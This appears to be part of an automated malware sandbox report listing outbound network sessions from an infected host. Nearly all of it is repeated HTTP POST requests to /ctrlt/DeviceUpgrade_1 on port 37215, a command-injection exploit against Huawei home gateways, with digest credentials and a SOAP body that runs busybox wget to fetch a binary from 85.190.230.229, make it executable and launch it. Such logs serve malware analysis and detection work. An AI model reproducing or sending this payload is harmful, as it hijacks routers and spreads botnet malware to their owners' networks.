                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      68192.168.2.1445372156.193.208.9337215
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 2, 2024 13:17:04.638719082 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      69192.168.2.1441624156.92.131.5337215
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 2, 2024 13:17:04.639938116 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:04.982055902 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:05.482124090 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:06.474023104 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:08.458034992 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:12.425801992 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:20.361546040 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:36.232990026 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:18:08.999499083 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
